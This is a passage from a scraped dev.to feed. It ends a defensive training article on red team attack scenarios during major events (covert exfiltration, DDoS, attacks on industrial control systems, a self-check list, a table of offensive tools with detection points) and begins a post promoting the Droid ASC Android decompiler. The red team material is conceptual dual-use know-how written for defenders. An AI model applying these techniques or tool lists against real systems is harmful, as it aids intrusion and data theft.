&lt;strong&gt;Covert exfiltration:&lt;/strong&gt; Use legitimate channels such as DNS tunnels, HTTP tunnels, cloud storage (OSS/S3), and email to complete data exfiltration.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trace cleaning:&lt;/strong&gt; Delete operation logs, erase operation traces, and reset timelines to delay the discovery of the attack through tracing.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.6.3 Typical Data Theft Techniques
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Covertness&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Direct database export&lt;/td&gt;
&lt;td&gt;Directly connect to the database and use tools for bulk export&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bulk packaging of file servers&lt;/td&gt;
&lt;td&gt;Compress large numbers of files and package them for exfiltration&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bulk email forwarding&lt;/td&gt;
&lt;td&gt;Forward sensitive emails in bulk through email accounts&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud storage relay&lt;/td&gt;
&lt;td&gt;Upload to public OSS/S3/network drives and then download&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNS/ICMP covert tunnels&lt;/td&gt;
&lt;td&gt;Exfiltrate data through DNS queries and ICMP packets&lt;/td&gt;
&lt;td&gt;Extremely high&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  3.6.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Deploy access control and data loss prevention (DLP) policies for core databases and file servers.&lt;/li&gt;
&lt;li&gt;Monitor abnormal data export behaviour: focus on large file operations within short periods, bulk access behaviour, and access during abnormal time periods.&lt;/li&gt;
&lt;li&gt;Monitor various exfiltration channels: including email outbound, network drives, cloud storage, and abnormal traffic.&lt;/li&gt;
&lt;li&gt;Implement data classification and grading management. Use encrypted storage and encrypted transmission for core data.&lt;/li&gt;
&lt;li&gt;Establish complete audit logs for data access behaviour. During major event security assurance, further strengthen monitoring of data egress.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.7 Scenario Seven: DDoS Attacks and Business Paralysis
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.7.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;DDoS (Distributed Denial of Service) attacks exhaust the target's bandwidth, system resources, and service capabilities by sending massive traffic or malformed requests, ultimately causing business paralysis. During major event security assurance, DDoS attacks are often used in combination with other business attacks to distract defenders and cover other attack operations.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.7.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Resource preparation:&lt;/strong&gt; Prepare through botnets, renting DDoS attack services, or building attack nodes independently.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Target reconnaissance:&lt;/strong&gt; Identify specific attack targets, including websites, DNS, apps, and core interfaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Traffic attack:&lt;/strong&gt; Launch high-traffic attacks (such as SYN or UDP Flood) and targeted protocol attacks (such as CC attacks or HTTPS slow attacks).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Combined attack:&lt;/strong&gt; Use high-frequency, multi-round, multi-directional attack patterns to repeatedly suppress the target.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Effect evaluation:&lt;/strong&gt; Monitor target business availability and adjust attack intensity and direction as appropriate.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.7.3 Typical DDoS Attack Types
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Attack Target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;High-traffic type&lt;/td&gt;
&lt;td&gt;Bandwidth attacks (UDP, SYN, DNS amplification)&lt;/td&gt;
&lt;td&gt;Egress bandwidth, links&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protocol type&lt;/td&gt;
&lt;td&gt;TCP/IP layer attacks (SYN Flood, Smurf)&lt;/td&gt;
&lt;td&gt;Devices, connections&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Application type&lt;/td&gt;
&lt;td&gt;CC attacks, slow HTTP, request flooding&lt;/td&gt;
&lt;td&gt;Web applications, business interfaces&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mixed type&lt;/td&gt;
&lt;td&gt;Combination of multiple techniques&lt;/td&gt;
&lt;td&gt;Overall business&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  3.7.4 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Deploy professional anti-DDoS devices and services. Pre-configure protection policies and alarm thresholds.&lt;/li&gt;
&lt;li&gt;Conduct traffic monitoring for critical businesses during major event security assurance and reserve capacity redundancy.&lt;/li&gt;
&lt;li&gt;Distribute attack traffic through high-defence IPs, CDNs, and cloud scrubbing.&lt;/li&gt;
&lt;li&gt;Formulate DDoS emergency response procedures in advance, specifying traffic switching, rate limiting, and scrubbing strategies.&lt;/li&gt;
&lt;li&gt;For application layer attacks, coordinate with WAF, rate limiting, and behaviour detection for protection.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.8 Scenario Eight: Critical Infrastructure and Industrial Control System Attacks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  3.8.1 Attack Description
&lt;/h4&gt;

&lt;p&gt;During major event security assurance, attacks against data centre infrastructure, power systems, cooling systems, operations monitoring systems, and industrial control systems (ICS/SCADA) must not be underestimated. Such attacks are often associated with APT organisations and state-backed hackers. Once successful, they not only produce physical impact but also cause extremely severe social consequences.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.8.2 Attack Chain Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IT-side penetration:&lt;/strong&gt; First obtain an attack foothold through the IT network (office network).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Boundary crossing:&lt;/strong&gt; Use boundary entry points between IT and OT networks (such as firewall vulnerabilities, ferry attacks, or operations channels) to cross into the target control network.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OT control:&lt;/strong&gt; Launch protocol attacks against industrial control protocols (Modbus, S7, DNP3) and issue malicious commands to controllers such as PLCs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Physical impact:&lt;/strong&gt; Tamper with target control logic, ultimately causing production interruption, equipment damage, or environmental anomalies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Infrastructure attack:&lt;/strong&gt; Attack monitoring systems, access control systems, UPS, and other operations infrastructure equipment.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.8.3 Blue Team Countermeasures
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Physical isolation:&lt;/strong&gt; Strictly isolate IT and OT networks. Prohibit direct exposure to the internet. Use one-way gateways for isolation protection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Least privilege configuration:&lt;/strong&gt; Open ports on industrial control devices as needed. Configure protocol whitelists and application whitelists.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Behaviour monitoring:&lt;/strong&gt; Deploy industrial control security monitoring systems to identify abnormal commands and abnormal access behaviour.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Backup and recovery:&lt;/strong&gt; Regularly back up critical controllers and system configurations. Formulate emergency switching plans in advance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Personnel control:&lt;/strong&gt; Mandate bastion hosts with auditing mechanisms for operations channels. Implement two-person operation rules and retain complete behaviour audit records.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Chapter 4: Summary of Red Team Attack Scenarios During Major Event Security Assurance
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4.1 Core Points in Attacks
&lt;/h3&gt;

&lt;p&gt;Based on the analysis of the eight major attack scenarios, the core points of red team attacks during major event security assurance can be summarised as the "five ones":&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One careful reconnaissance:&lt;/strong&gt; Attackers continuously collect target information before and during the event. Reducing the attack surface is the first line of defence.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One attack entry point:&lt;/strong&gt; All attacks require finding an entry point into the target system. The fewer the entry points, the harder the access, and the more detection layers there are, the greater the attack difficulty.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One privilege escalation:&lt;/strong&gt; The jump from low privilege to high privilege often reuses vulnerabilities and passwords. Privilege governance is the core of protection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One lateral movement:&lt;/strong&gt; Lateral movement is the attacker's highway. Network isolation and account control are key to blocking this step.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One data exfiltration:&lt;/strong&gt; Data exfiltration is the final kick of the attack. Data loss prevention and egress monitoring are the last line of defence.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4.2 Core Common Characteristics of Red Team Attacks
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Characteristic&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Defence Countermeasure&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Long attack chain&lt;/td&gt;
&lt;td&gt;Many attack stages and long steps&lt;/td&gt;
&lt;td&gt;Set up layered detection at each stage of the attack chain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Strong covertness&lt;/td&gt;
&lt;td&gt;Encryption, legitimate tools, obfuscation&lt;/td&gt;
&lt;td&gt;Behaviour analysis, correlation analysis, threat intelligence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependence on passwords&lt;/td&gt;
&lt;td&gt;Password brute-forcing, credential theft&lt;/td&gt;
&lt;td&gt;Strong passwords, MFA, credential protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependence on vulnerabilities&lt;/td&gt;
&lt;td&gt;Boundary vulnerabilities, component vulnerabilities&lt;/td&gt;
&lt;td&gt;Reduce attack surface, timely patching, zero trust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reliance on social engineering&lt;/td&gt;
&lt;td&gt;Phishing, spear-phishing, pre-placement&lt;/td&gt;
&lt;td&gt;Employee awareness, email protection, MFA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clear objectives&lt;/td&gt;
&lt;td&gt;Core data, business availability&lt;/td&gt;
&lt;td&gt;Data classification, business redundancy, emergency exercises&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  4.3 Five Key Actions for Blue Team Defence
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Reduce the attack surface:&lt;/strong&gt; Minimise internet exposure. Complete comprehensive assessment and entry point closure before major event security assurance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Strengthen boundary and identity protection:&lt;/strong&gt; Implement boundary protection plus zero-trust architecture to achieve continuous verification and dynamic authorisation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection and response:&lt;/strong&gt; Establish a closed-loop mechanism of detection, analysis, response, and recovery to compress attacker dwell time (FTO).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data loss prevention:&lt;/strong&gt; Implement data classification and grading control. Deploy DLP and conduct egress monitoring to hold the last pass of data security.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Emergency response and review:&lt;/strong&gt; Maintain high readiness throughout major event security assurance. Conduct timely reviews and summaries to continuously optimise and improve the protection system.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  4.4 Conclusion
&lt;/h3&gt;

&lt;p&gt;Major event security assurance attack-defence confrontation is a systematic engineering project of attack-defence confrontation and mutual growth. Although red team attack scenarios are diverse, their core logic remains unchanged: the entry point of an attack is the exposure surface, the bond of the attack is passwords and trust, and the end point of the attack is data and business. Only by conducting proactive exercises, continuous hardening, and pragmatic operations from a red team perspective can the blue team transform the place where attacks are most likely to succeed into the place where defence is most solid.&lt;/p&gt;

&lt;h2&gt;
  
  
  Chapter 5: Closing Remarks
&lt;/h2&gt;

&lt;p&gt;Red team attack scenarios during major event security assurance are constantly evolving, and attack methods are continuously upgrading. However, attackers always act around three core objectives: first, obtaining an entry point—using the exposure surface to break into the system; second, gaining trust—stealing identities and credentials; third, achieving the attack end point—stealing or destroying data and business. By securing these three core links, the security defence line can be firmly held. This training aims to help every blue team member establish an attack-to-promote-defence mindset, ensuring that during major event security assurance operations they can see it, defend against it, and handle it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Appendix A: Self-Check Checklist for Red Team Attack Scenarios During Major Event Security Assurance
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;No.&lt;/th&gt;
&lt;th&gt;Check Item&lt;/th&gt;
&lt;th&gt;Completed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Internet exposure asset list has been compiled and reduced&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Boundary devices, VPNs, and bastion hosts have undergone vulnerability assessment and hardening&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;All employees have completed phishing email exercises and security awareness training&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Multi-factor authentication (MFA) has been enabled for key systems&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Suppliers and outsourced personnel have been registered, and accounts have been granted least privilege&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Security audits have been implemented for code repositories and build pipelines&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;A mechanism for obtaining vulnerability intelligence and patching core components has been established&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Security zone isolation and lateral access control have been implemented in the internal network&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Access control and DLP have been implemented for core databases and files&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Monitoring and alerting have been established for data egress channels&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;DDoS protection devices have been deployed and policies configured&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Industrial control and infrastructure networks have been physically/logically isolated&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Centralised log collection and correlation analysis are ready&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Major event security assurance emergency plans have been exercised&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Blue team duty rosters and escalation response procedures have been clarified&lt;/td&gt;
&lt;td&gt;□&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Appendix B: Quick Reference for Common Red Team Tools and Detection Countermeasures
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Common Tools&lt;/th&gt;
&lt;th&gt;Blue Team Detection and Countermeasure Points&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Asset mapping&lt;/td&gt;
&lt;td&gt;FOFA, Shodan, Quake, Subfinder&lt;/td&gt;
&lt;td&gt;Reduce exposure surface, eliminate fingerprint features&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vulnerability scanning&lt;/td&gt;
&lt;td&gt;Nuclei, xray, Goby, vulmap&lt;/td&gt;
&lt;td&gt;Timely patching, disable dangerous components&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Web attack&lt;/td&gt;
&lt;td&gt;SQLMap, BurpSuite, Yujian&lt;/td&gt;
&lt;td&gt;WAF policies, parameter governance, privilege escalation protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backdoor management&lt;/td&gt;
&lt;td&gt;Godzilla, Behinder, in-memory webshells&lt;/td&gt;
&lt;td&gt;Traffic signatures, process behaviour detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Internal network penetration&lt;/td&gt;
&lt;td&gt;Fscan, Ladon, Cobalt Strike&lt;/td&gt;
&lt;td&gt;Segmentation and isolation, log auditing, behaviour analysis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral movement&lt;/td&gt;
&lt;td&gt;PsExec, Impacket, WMI&lt;/td&gt;
&lt;td&gt;Account monitoring, whitelists, credential protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege escalation&lt;/td&gt;
&lt;td&gt;Kernel vulnerabilities, Potato family privilege escalation, service misconfigurations&lt;/td&gt;
&lt;td&gt;Timely patching, least privilege&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain attack&lt;/td&gt;
&lt;td&gt;Mimikatz, BloodHound, DCSync&lt;/td&gt;
&lt;td&gt;Account auditing, behaviour monitoring&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tunnelling&lt;/td&gt;
&lt;td&gt;frp, Neo-reGeorg, DNS tunnels&lt;/td&gt;
&lt;td&gt;Egress monitoring, whitelists, traffic detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data exfiltration&lt;/td&gt;
&lt;td&gt;Cloud drives, encryption, DNS tunnels&lt;/td&gt;
&lt;td&gt;Data loss prevention, egress monitoring&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Article Source: &lt;a href="https://excalibra.github.io/posts/2026/20260923-red-team-attack-scenarios-major-event-security/" rel="noopener noreferrer"&gt;https://excalibra.github.io/posts/2026/20260923-red-team-attack-scenarios-major-event-security/&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The procedures and technical methods contained in this article are intended solely for legal and compliant security research and teaching scenarios, with the aim of enhancing network security protection capabilities. They possess clear technical research attributes.&lt;/p&gt;

&lt;p&gt;Any unit or individual that uses the content of this article for illegal purposes such as attack or destruction without authorisation shall bear all legal liability, civil compensation, and joint liability independently; this site assumes no joint liability.&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>cybersecurity</category>
      <category>pentest</category>
      <category>security</category>
      <category>redteam</category>
    </item>
    <item>
      <title>Droid ASC: A High-Performance Tool for Android Reverse Engineering and Vulnerability Discovery</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sat, 12 Sep 2026 21:29:16 +0000</pubDate>
      <link>https://dev.to/excalibra/droid-asc-a-high-performance-tool-for-android-reverse-engineering-and-vulnerability-discovery-1ci9</link>
      <guid>https://dev.to/excalibra/droid-asc-a-high-performance-tool-for-android-reverse-engineering-and-vulnerability-discovery-1ci9</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Droid ASC is a high-performance tool for Android reverse engineering and mobile security testing. It reduces memory usage by two orders of magnitude and eliminates disk caching compared to the traditional jadx decompiler, achieving second-level decompilation and millisecond search. Its core advantages lie in zero indexing, on-demand decompression, and leveraging R8 optimisation, significantly improving the efficiency of large-scale sensitive information screening and API attack surface mapping. It is suitable for red teams, SRC (Security Response Centre) operations, and emergency response scenarios, and is recommended for use in authorised testing only.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Categories:&lt;/strong&gt; Mobile Security, Reverse Engineering, Security Tools, Penetration Testing, Practical Experience&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Executive Summary
&lt;/h2&gt;

&lt;p&gt;This briefing examines Droid ASC, an open-source Android reverse engineering tool unveiled at the Black Hat Europe 2026 Arsenal. The tool addresses a persistent bottleneck in mobile security testing: the slow decompilation and high memory consumption of traditional tools such as jadx when handling large APK files. By adopting a zero-index architecture, on-demand decompression of the Deflate stream, and exploitation of R8 compiler optimisations, Droid ASC achieves dramatic performance improvements. Benchmark results demonstrate search speeds up to 269 times faster and memory usage up to 125 times lower than jadx, with no disk cache. For penetration testers, red teams, and mobile bug bounty hunters, this efficiency translates directly into increased testing coverage and, consequently, greater revenue potential in pay-per-vulnerability environments.&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction: The Inefficiency of Traditional Decompilers
&lt;/h2&gt;

&lt;p&gt;Mobile security practitioners are well aware of the economics: a single vulnerability may yield bounties ranging from thousands to tens of thousands, but the true budget drain is time. Loading a several-hundred-megabyte APK into jadx causes fans to spin, memory usage to soar beyond ten gigabytes, and progress bars to crawl for tens of minutes—sometimes culminating in an out-of-memory (OOM) failure. Meanwhile, competitors may have already submitted multiple vulnerabilities. In crowd-testing and SRC programmes, where payment is per vulnerability, tool efficiency directly converts into income.&lt;/p&gt;

&lt;p&gt;The traditional decompilation workflow, from jadx to older tools, has focused on full unpacking, global indexing, and cross-referencing. However, the modern decompiler essentially rebuilds a bloated relational database over highly structured compilation artefacts—an approach that is fundamentally contrary to common sense. Droid ASC challenges this paradigm by treating the APK as a database to be queried on demand, rather than a project to be indexed exhaustively.&lt;/p&gt;

&lt;h2&gt;
  
  
  Benchmark Performance
&lt;/h2&gt;

&lt;p&gt;Official comparative tests were conducted on four real-world commercial APKs (10 threads, with jadx as the control group). The results are striking:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Test APK (Size)&lt;/th&gt;
&lt;th&gt;Global String Search&lt;/th&gt;
&lt;th&gt;Decompile Single Class&lt;/th&gt;
&lt;th&gt;Memory Usage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;TelegramX (59 MB)&lt;/td&gt;
&lt;td&gt;493 ms vs 20 s&lt;/td&gt;
&lt;td&gt;168 ms vs 6 s&lt;/td&gt;
&lt;td&gt;36 MB vs 1,016 MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WhatsApp (130 MB)&lt;/td&gt;
&lt;td&gt;620 ms vs 32 s&lt;/td&gt;
&lt;td&gt;160 ms vs 15 s&lt;/td&gt;
&lt;td&gt;36 MB vs 2.1 GB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Grab (228 MB)&lt;/td&gt;
&lt;td&gt;1.01 s vs 2 m 14 s&lt;/td&gt;
&lt;td&gt;177 ms vs 1 m 37 s&lt;/td&gt;
&lt;td&gt;56 MB vs 7.1 GB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Douyin (352 MB)&lt;/td&gt;
&lt;td&gt;1.79 s vs 8 m 02 s (49% OOM)&lt;/td&gt;
&lt;td&gt;415 ms vs 1 m 32 s&lt;/td&gt;
&lt;td&gt;141 MB vs 13.2 GB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Notably, jadx’s global search on the 352 MB Douyin package ran to 49% and was terminated by an OOM error, whereas Droid ASC produced results in 1.79 seconds. The performance multipliers are significant: search speeds up to 269 times faster, decompilation up to 222 times faster, and memory efficiency 125 times greater. In terms of disk cache, Droid ASC uses 0 MB, while jadx writes between 119 MB and 322 MB for index caching.&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F72d8dd97-0fa1-48e9-b519-e327f08bdf6c" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F72d8dd97-0fa1-48e9-b519-e327f08bdf6c" width="1080" height="1550"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Figure 1: Comparison of Droid ASC and jadx official benchmark results. (Credit: GitHub MG1937/ASC)&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Zero-Index Approach: Core Innovations
&lt;/h2&gt;

&lt;p&gt;Traditional decompilers spend the majority of their time on full unpacking, global index construction, and cross-referencing. Droid ASC’s author argues that compilation output is highly structured data, yet modern decompilers rebuild it into an unwieldy relational database—an approach that defies common sense. Droid ASC employs four key technologies:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Direct Probing of the Deflate Stream&lt;/strong&gt; – Rather than fully decompressing the APK, Droid ASC constructs a dense Huffman lookup table and extracts only the necessary core metadata blocks, disregarding the rest of the data.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Weaponising R8 Compiler Optimisations&lt;/strong&gt; – R8 employs deterministic constant propagation and instruction de-duplication, concentrating code physically. Droid ASC leverages this compiler behaviour to achieve lightning-fast searches across DEX files.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;O(1) Instruction-to-Method Mapping&lt;/strong&gt; – Bytecode offsets are mapped to methods in constant time, without constructing any map table.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;In-Memory Reconstruction of Minimal DEX&lt;/strong&gt; – Upon a hit, only the target class and its dependent bytecode are dynamically assembled into a self-consistent minimal DEX, which is immediately decompiled.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The entire process is stateless, with zero preprocessing and zero disk caching. It leaves no trace on the machine after execution.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Use Droid ASC
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Step 1: Environment Preparation
&lt;/h3&gt;

&lt;p&gt;The project is pure Python and can be run after cloning. It uses androguard as the decompilation backend, mutf8 for Dalvik string encoding, and Tkinter for the GUI. No other heavyweight dependencies are required.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/MG1937/ASC.git
&lt;span class="nb"&gt;cd &lt;/span&gt;ASC
pip &lt;span class="nb"&gt;install &lt;/span&gt;androguard mutf8
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Graphical Interface
&lt;/h3&gt;

